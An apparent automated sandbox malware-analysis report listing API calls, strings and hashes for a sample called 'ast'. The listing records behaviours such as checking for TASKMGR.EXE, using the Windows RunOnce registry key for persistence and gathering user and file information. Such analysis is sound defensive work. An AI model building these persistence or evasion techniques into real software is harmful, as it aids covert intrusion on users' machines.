                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B776970: inet_pton.WS2_32(00000002,?,?), ref: 6B77699A
                                                                                                                                              • Part of subcall function 6B776970: inet_pton.WS2_32(00000017,?,?), ref: 6B7769AB
                                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B775CC3
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B775CD2
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B775D8E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: inet_pton$___from_strstr_to_strchr
                                                                                                                                            • String ID: /
                                                                                                                                            • API String ID: 1475684856-2043925204
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,8hwk,?,6B7CCF35,8hwk,6B7EE6B8,0000000C,6B7CCFE7,6B7EE430), ref: 6B7CD05D
                                                                                                                                            • GetLastError.KERNEL32(?,6B7CCF35,8hwk,6B7EE6B8,0000000C,6B7CCFE7,6B7EE430), ref: 6B7CD067
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7CD092
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                            • String ID: 8hwk
                                                                                                                                            • API String ID: 2583163307-3892429355
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7AACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B7AAEAE), ref: 6B7AACCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B7790FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                            • API String ID: 1646373207-3788156360
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D4E87
                                                                                                                                            • _free.LIBCMT ref: 6B7D4EB0
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,6B7CD700,00000000,?,?,?,?,?,?,?,?,6B7CD700,?,00000000), ref: 6B7D4EE2
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6B7CD700,?,00000000,?,?,?,?,00000000,?), ref: 6B7D4EFE
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B7C37F2,?,00000000,00000000,?,6B7C84AA,6B7C8987,00000000,?,00000000), ref: 6B7CF540
                                                                                                                                            • _free.LIBCMT ref: 6B7CF59D
                                                                                                                                            • _free.LIBCMT ref: 6B7CF5D3
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B7C84AA,6B7C8987,00000000,?,00000000), ref: 6B7CF5DE
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            APIs
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(6B79F03B,?,6B77669E,6B79F03B,?,?,?,?), ref: 6B7AE5E5
                                                                                                                                            • __alldvrm.LIBCMT ref: 6B7AE5FE
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7AE627
                                                                                                                                            • GetTickCount.KERNEL32 ref: 6B7AE642
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1296068966-0
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000), ref: 6B7D8616
                                                                                                                                            • GetLastError.KERNEL32(?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?,00000000,?,6B7CEDE5,?), ref: 6B7D8622
                                                                                                                                              • Part of subcall function 6B7D85E8: CloseHandle.KERNEL32(FFFFFFFE,6B7D8632,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?,00000000), ref: 6B7D85F8
                                                                                                                                            • ___initconout.LIBCMT ref: 6B7D8632
                                                                                                                                              • Part of subcall function 6B7D85AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B7D85D9,6B7D50EF,00000000,?,6B7CE891,?,6B7C92EA,00000000,?), ref: 6B7D85BD
                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B7D5102,00000000,00000001,00000000,00000000,?,6B7CE891,?,6B7C92EA,00000000,?), ref: 6B7D8647
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77AE35
                                                                                                                                            Strings
                                                                                                                                            • Can't get the size of %s, xrefs: 6B77AF14
                                                                                                                                            • Can't open %s for writing, xrefs: 6B77AE9E
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                                            • API String ID: 601868998-3544860555
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B77615B
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: Set-Cookie:$none
                                                                                                                                            • API String ID: 482932555-3629594122
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7887E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B787CB2,?,?,?,00000106,?,00000000), ref: 6B788830
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B7888CF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: :%u$Hostname in DNS cache was stale, zapped
                                                                                                                                            • API String ID: 1809024409-2924501231
                                                                                                                                            • Opcode ID: f84549c5897e4695dd9cac03f6e5e48b00b8bb3b824a6087a161587ac47857a6
                                                                                                                                            • Instruction ID: d6b7424bc94d812f9c08857c1564b40844cdcc4b2979f7d3b623ed28fd21af27
                                                                                                                                            • Opcode Fuzzy Hash: f84549c5897e4695dd9cac03f6e5e48b00b8bb3b824a6087a161587ac47857a6
                                                                                                                                            • Instruction Fuzzy Hash: CD41F331A00209ABCB19CF38CD85AEEB778EF05358F0042F9F95953201DB35AA56CF91
                                                                                                                                            APIs
                                                                                                                                            • curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B788617,00000000,00000000,?,00000000), ref: 6B79DB87
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B79DC0D
                                                                                                                                            Strings
                                                                                                                                            • Content-Type: application/dns-message, xrefs: 6B79DB74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_appendcurl_slist_free_all
                                                                                                                                            • String ID: Content-Type: application/dns-message
                                                                                                                                            • API String ID: 2220803400-4173715026
                                                                                                                                            • Opcode ID: 5516fcab35b3a41fafa9438e456b26e4e1dbd9ddd8b71ac1ddb7b822b969813b
                                                                                                                                            • Instruction ID: 22ab4664d6f209682abb1207adbfb6ba82d652901821b0bfc01b2a43c74a3bf7
                                                                                                                                            • Opcode Fuzzy Hash: 5516fcab35b3a41fafa9438e456b26e4e1dbd9ddd8b71ac1ddb7b822b969813b
                                                                                                                                            • Instruction Fuzzy Hash: 6E21E7B2944B04AFE7119E30FD45BDBB7A9FF05308F004829FA2E93291D776A510CB90
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7AABA5
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7AABD5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: 8Twk
                                                                                                                                            • API String ID: 601868998-3312508639
                                                                                                                                            • Opcode ID: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                                            • Instruction ID: 846e2edc4e9c3f713660ab0224e41812e1665ed609cda21111883bd052af4da9
                                                                                                                                            • Opcode Fuzzy Hash: 9bf5e416b5dd8105ad433a63281058cab258d468c68ca83fe4601581a0470b8c
                                                                                                                                            • Instruction Fuzzy Hash: E711DB355082519FEB418F24AD40BBABBBDEF06659F1401E5FCD48B242D339D815C7B0
                                                                                                                                            APIs
                                                                                                                                            • getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B77343B
                                                                                                                                            • setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B773460
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: getsockoptsetsockopt
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 194641219-2726393805
                                                                                                                                            • Opcode ID: 2e813b1fbba4cf35d34607a62bbebdfafd7d0d2ff2bf1cee35583a73d7b5e2a5
                                                                                                                                            • Instruction ID: 549eee54332d52f49e4a8a59c265739aa900dd0629f85dea1b76ec5f11cf2449
                                                                                                                                            • Opcode Fuzzy Hash: 2e813b1fbba4cf35d34607a62bbebdfafd7d0d2ff2bf1cee35583a73d7b5e2a5
                                                                                                                                            • Instruction Fuzzy Hash: 7401B5B1944209BBEF21DF94DD46FAD77B8EB01704F2041B0FA14AA2C0DBB99645DB40
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Digest,6B78B74C,00000006,00000DD0,?,?,6B78B74C), ref: 6B78D8E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: Digest$t!
                                                                                                                                            • API String ID: 482932555-3305821177
                                                                                                                                            • Opcode ID: d6ec74e8adff235c9035c40f58928c4704f21993bf4cde8ead50036691dbe81f
                                                                                                                                            • Instruction ID: c1eafa9a3e4c1adca03f2605dbc78f6c73690d079c3d55180078a85a9563e912
                                                                                                                                            • Opcode Fuzzy Hash: d6ec74e8adff235c9035c40f58928c4704f21993bf4cde8ead50036691dbe81f
                                                                                                                                            • Instruction Fuzzy Hash: 77F0F653A4425426DF004E69BE01B9A779D8F92198F0800B6FD9C9B242E62EE5258AF0
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7CFE82
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                            • String ID: 8hwk$8hwk
                                                                                                                                            • API String ID: 1353095263-3323349157
                                                                                                                                            • Opcode ID: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                                            • Instruction ID: 0a550b3db1046d9aa322355f2eadb0f4ee1074898122737dd73a24a1ceae5174
                                                                                                                                            • Opcode Fuzzy Hash: 9770ed075f98e788226680082193b8a9b24cb435b710d5a09513da189204d849
                                                                                                                                            • Instruction Fuzzy Hash: 80F06D371403059F8710CF68DA00A86B7E4EF99721310892AF89ED7210D330E516CB90
                                                                                                                                            APIs
                                                                                                                                            • WSASetLastError.WS2_32(00002726,?,6B79744F,?,?,?,?,00000000,?), ref: 6B7A04EE
                                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B7A0511
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                                            • String ID: Otyk
                                                                                                                                            • API String ID: 1458359878-2505452948
                                                                                                                                            • Opcode ID: 298bc1577f5eb3af36c5fe3aa970f2a8f7c23dadcaa7407a23713e1f21e1f43d
                                                                                                                                            • Instruction ID: 7728d4523fdb52cd53330ed5c1b300f318ad2b7274d9f778151271e479953de9
                                                                                                                                            • Opcode Fuzzy Hash: 298bc1577f5eb3af36c5fe3aa970f2a8f7c23dadcaa7407a23713e1f21e1f43d
                                                                                                                                            • Instruction Fuzzy Hash: ABE09B712546094BEB585E7D4E04B5D3395BFC6774F10DF28F87A852D0FB79D4004540

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:6.1%
                                                                                                                                            Total number of Nodes:99
                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,TASKMGR.EXE), ref: 070013F6
                                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 07001418
                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 07001426
                                                                                                                                            • Sleep.KERNEL32(00000001), ref: 0700144D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$CreateFirstNextSleepSnapshotToolhelp32
                                                                                                                                            • String ID: TASKMGR.EXE
                                                                                                                                            • API String ID: 1819645093-3666515839
                                                                                                                                            • Opcode ID: b358a52369e193c9e8517dc841a954da49eada74cce5cc24e7adddca5e57aff8
                                                                                                                                            • Instruction ID: 99b72031f18dc869c480a0657b30f758287839bb27282c91c7dd68041e829959
                                                                                                                                            • Opcode Fuzzy Hash: b358a52369e193c9e8517dc841a954da49eada74cce5cc24e7adddca5e57aff8
                                                                                                                                            • Instruction Fuzzy Hash: B5012171A00119ABDB209FA49C0EB9E7BF9FB05771F010250E645D25A0DBB8DA609B90

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • lstrcat.KERNEL32(?,070025D7), ref: 070025DC
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 070025F0
                                                                                                                                              • Part of subcall function 07002600: lstrcmp.KERNEL32(?,070025FE), ref: 07002601
                                                                                                                                              • Part of subcall function 07002600: lstrcat.KERNEL32(?,?), ref: 0700262F
                                                                                                                                              • Part of subcall function 07002600: FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                              • Part of subcall function 07002600: FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1879274390-0
                                                                                                                                            • Opcode ID: 70b5ff2c0fc0bb8fa303ac7d35febad6c2a08c39db5145e1b3e05b7e95ce917f
                                                                                                                                            • Instruction ID: 48930648d8357c57954e6677d38f9d7224ea0c235247584ba3584c7cbcae87d4
                                                                                                                                            • Opcode Fuzzy Hash: 70b5ff2c0fc0bb8fa303ac7d35febad6c2a08c39db5145e1b3e05b7e95ce917f
                                                                                                                                            • Instruction Fuzzy Hash: 4C0184F6904102AFDB216F74DC4DE8A7FE8FF06361F014691B14AD1651DE39C5708BA1
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 070025F0
                                                                                                                                              • Part of subcall function 07002600: FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                              • Part of subcall function 07002600: FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                            • Opcode ID: 1eb6915bd640217e1bb379b7e11fdc0ddc438a719cfb2687d39b3bf75919ac49
                                                                                                                                            • Instruction ID: 48930648d8357c57954e6677d38f9d7224ea0c235247584ba3584c7cbcae87d4
                                                                                                                                            • Opcode Fuzzy Hash: 1eb6915bd640217e1bb379b7e11fdc0ddc438a719cfb2687d39b3bf75919ac49
                                                                                                                                            • Instruction Fuzzy Hash: 4C0184F6904102AFDB216F74DC4DE8A7FE8FF06361F014691B14AD1651DE39C5708BA1
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(00000400,00000400), ref: 07002213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            • Opcode ID: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction ID: 296470ea2d1905e73cca287aa37e26fdfe67e2562d18cc4f69aa6f6bc27716d3
                                                                                                                                            • Opcode Fuzzy Hash: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction Fuzzy Hash: 52C08CB040020DFBDF00EF90E90A89D7BB8AB80348F0081A4E60166044DBB8AB0ADBD1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateQueryValue
                                                                                                                                            • String ID: Software\safib$\ast\SS$config$config.ini
                                                                                                                                            • API String ID: 4083198587-3540514454
                                                                                                                                            • Opcode ID: c5565a7de491dc6568a0463004f9f232f8743b40bfe636c98245bcad8558ac9b
                                                                                                                                            • Instruction ID: 54b41f1fe5fe27843e7c018b9d3c75928e29cad011c0b2775ef03252e870227f
                                                                                                                                            • Opcode Fuzzy Hash: c5565a7de491dc6568a0463004f9f232f8743b40bfe636c98245bcad8558ac9b
                                                                                                                                            • Instruction Fuzzy Hash: F13150F0644206AFFB629BA4DC49FEEB6B9AF49760F004218F605F51C0DBA495148BE5
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,00000000,00000000), ref: 070036AC
                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 070036CD
                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 070037C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateQueryValue
                                                                                                                                            • String ID: config$config.ini
                                                                                                                                            • API String ID: 4083198587-1050631951
                                                                                                                                            • Opcode ID: 5591b2bdcd667e0dc1ed13bf0b24785abe6a8311ef86c373d874d757be97df73
                                                                                                                                            • Instruction ID: f8164400ffbbbeb80d2cb5443178fb01a6a09cab8e3bf54856d78385db98791e
                                                                                                                                            • Opcode Fuzzy Hash: 5591b2bdcd667e0dc1ed13bf0b24785abe6a8311ef86c373d874d757be97df73
                                                                                                                                            • Instruction Fuzzy Hash: EA313FF1604206AFFB619BA49C49FEEB7B9EF49760F000229F605F51C0DB7495148BE5
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOncet,00000000,000F013F,?), ref: 070011AA
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00007361,00000000,?,00000000,?), ref: 070011D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOncet$as$t
                                                                                                                                            • API String ID: 4153817207-21673019
                                                                                                                                            • Opcode ID: 07ccce7c00709dfb5ed2f072ac9779c40d4c477e807be4cf1ae99becfacdb78c
                                                                                                                                            • Instruction ID: 807d549a89ba713b3af90846bc0531ba34918e81cebad7387fd2e56a28287112
                                                                                                                                            • Opcode Fuzzy Hash: 07ccce7c00709dfb5ed2f072ac9779c40d4c477e807be4cf1ae99becfacdb78c
                                                                                                                                            • Instruction Fuzzy Hash: A9311EB0900219EEEF10CF91DD45BEDBBB9FB84B04F108188E2047A195D7755B54CFA5

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\template\), ref: 07002F67
